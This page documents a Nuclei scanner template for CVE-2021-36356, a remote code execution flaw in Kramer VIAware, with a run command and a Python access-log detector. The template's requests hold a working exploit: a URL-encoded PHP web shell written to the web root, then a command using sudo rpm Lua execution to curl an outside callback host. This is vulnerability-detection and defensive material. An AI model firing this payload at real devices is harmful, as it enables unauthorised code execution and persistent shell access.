Kramer VIAware - Remote Code Execution
ID: CVE-2021-36356
Severity: critical
Author: gy741
Tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
Description
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
YAML Source
id: CVE-2021-36356

info:
  name: Kramer VIAware - Remote Code Execution
  author: gy741
  severity: critical
  description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
  reference:
    - https://www.exploit-db.com/exploits/50856
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
    - https://write-up.github.io/kramerav/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36356
    cwe-id: CWE-434
    epss-score: 0.88569
    epss-percentile: 0.98691
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
      - |
        GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4a0a00473045022100ab24d4517659cfc71cc9174bedd7f06a98d19a88518a943c6370da62ce2ef5b6022046964e6b7878197eb6156a2cb11b6856c59f0ceabd08bd409631d6bb5d95afce:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects CVE-2021-36356 in Kramer VIAware web interfaces and is run with the Nuclei tool. It is tagged intrusive: the first request writes a PHP file under /var/www/html on the target and neither request removes it, so a host that matches needs that file cleaned up afterwards.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36356.yaml"
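
The two requests in the template leave a recognizable pair in a web server access log: a POST to the write endpoint, then a GET from the same client for a top-level .php file with a cmd parameter. The following is an added detection example, not part of the template or of Kramer's software; the Combined Log Format, the known_pages allow-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Combined Log Format; adjust the regex to the appliance's real log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
WRITE_ENDPOINT = "/ajaxPages/writeBrowseFilePathAjax.php"  # endpoint named on this page

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2022:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2022:10:04:10 +0000] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 200 2 "-" "curl/7.68.0"
203.0.113.9 - - [12/Mar/2022:10:04:11 +0000] "GET /kq3vx.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.68.0"
198.51.100.7 - - [12/Mar/2022:10:05:00 +0000] "GET /report.php?cmd=export HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

def find_upload_then_exec(log_text, known_pages=frozenset({"/index.php"})):
    """Return findings where a client POSTs to the write endpoint and later
    requests an unknown web-root .php file carrying a `cmd` parameter."""
    writers = {}   # client IP -> timestamp of its first POST to the endpoint
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path == WRITE_ENDPOINT:
            writers.setdefault(m["ip"], m["ts"])
            continue
        # The template writes to /var/www/html/<name>.php, i.e. a top-level script.
        top_level_php = url.path.count("/") == 1 and url.path.endswith(".php")
        if (m["ip"] in writers and top_level_php
                and url.path not in known_pages
                and "cmd" in parse_qs(url.query, keep_blank_values=True)):
            findings.append({"ip": m["ip"], "write_ts": writers[m["ip"]],
                             "exec_ts": m["ts"], "path": url.path,
                             "status": int(m["status"])})
    return findings

if __name__ == "__main__":
    for finding in find_upload_then_exec(SAMPLE_LOG):
        print(finding)
```

Access logs normally omit POST bodies, so the written filename is inferred from the follow-up GET; any POST to the endpoint from an unexpected client is worth reviewing on its own, alongside a check of /var/www/html for .php files that are not part of the firmware.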